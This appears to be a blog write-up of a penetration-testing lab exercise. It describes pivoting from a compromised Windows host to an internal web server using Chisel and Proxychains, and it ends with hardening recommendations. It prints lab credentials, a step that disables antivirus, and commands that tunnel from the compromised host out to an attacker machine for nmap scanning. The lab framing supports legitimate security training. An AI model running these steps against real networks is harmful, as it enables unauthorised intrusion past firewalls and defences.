Gary Jones
Gary Jones
ChiselProxychainsnmapCybersecurity

Chisel and Proxychains To Breach Internal Web Server

Chisel and Proxychains To Breach Internal Web Server
0 views
3 min read
#Chisel#Proxychains#nmap#Cybersecurity
Table Of Content

Pivoting to Access devbox.artstailor.com with Chisel and Proxychains

Situation:

This exercise aimed to demonstrate pivoting techniques to access an otherwise inaccessible internal web server, devbox.artstailor.com. By leveraging a Chisel SOCKS proxy and administrative credentials for costumes.artstailor.com, the goal was to perform an nmap scan, forward a local port, and assess the development status of Art’s web application.

Obstacles:

  1. Firewall Configuration: Required bypassing restrictions to communicate with internal systems.
  2. ICMP Blocking: Chisel SOCKS5 proxy does not support ICMP packets, requiring alternative host discovery methods.
  3. Port Detection: Narrowing down critical ports for identifying the operating system and services on the target.

Actions Taken:

  1. Initial Setup:
    • Logged into costumes.artstailor.com using provided administrative credentials (pr0b3admin:H4ck3rH4nkH1tsB4ck).
    • Shared the /temp folder to facilitate file transfers between Kali and the target system.
    • Disabled real-time virus protection to allow execution of Chisel and other tools.
  2. Chisel Configuration:
    • Started Chisel in server mode on Kali using the command: 
      chisel server -p 1080 --socks5
    • Ran the Chisel client on costumes.artstailor.com to establish a SOCKS proxy connection: 
      chisel.exe client kali.pr0b3.com:1080 socks
  3. nmap Scanning via Proxychains:
    • Updated proxychains4.conf to route traffic through the Chisel SOCKS5 proxy.
    • Conducted an nmap scan of devbox.artstailor.com, focusing on key ports: 
      proxychains nmap -Pn -sV devbox.artstailor.com -p22,80
    • Identified ports 22 (SSH) and 80 (HTTP) as open, confirming the target is running Linux.
  4. Port Forwarding and Web Application Analysis:
    • Forwarded local port 8080 to devbox.artstailor.com:80 using Chisel.
    • Accessed the development web page through Kali’s browser to assess its functionality.

Results:

  1. Vulnerability Identified:
    • Open Ports: Port 22 (SSH) and port 80 (HTTP) were accessible through the proxy.
    • Weak Firewall Configuration: Allowed unrestricted proxy traffic to internal systems.
  2. Development Status:
    • The web application on port 80 loaded successfully, displaying an under-construction version of Art’s tailor management system.
    • Port 22 confirmed the presence of an SSH service, likely for development or administration purposes.
  3. Risk Level:
    • High: Misconfigurations and open ports expose sensitive development environments to potential exploitation.

Tool Purpose Overview:

Chisel:

  • A TCP/UDP tunneling tool used to create a SOCKS5 proxy for accessing internal systems behind a firewall.

Proxychains:

  • Routes traffic through a proxy, enabling tools like nmap to communicate with internal systems indirectly.

nmap:

  • Network scanning tool used to identify open ports, services, and operating systems on the target.

rdesktop:

  • Utilized for remote access to costumes.artstailor.com to manage Chisel and perform administrative tasks.

Recommendations:

  1. Restrict Proxy Access:
    • Limit SOCKS proxy usage to specific IPs and authenticated users only.
    • Monitor proxy activity for unusual patterns.
  2. Enhance Firewall Rules:
    • Close unnecessary ports like 22 and 80 if they are not required for external access.
    • Implement internal segmentation to isolate development systems.
  3. Secure Development Environments:
    • Require strong authentication for SSH access to development servers.
    • Periodically review open ports and services for unnecessary exposure.
  4. Routine Vulnerability Scanning:
    • Schedule regular scans to identify and mitigate misconfigurations promptly.

View PDF Document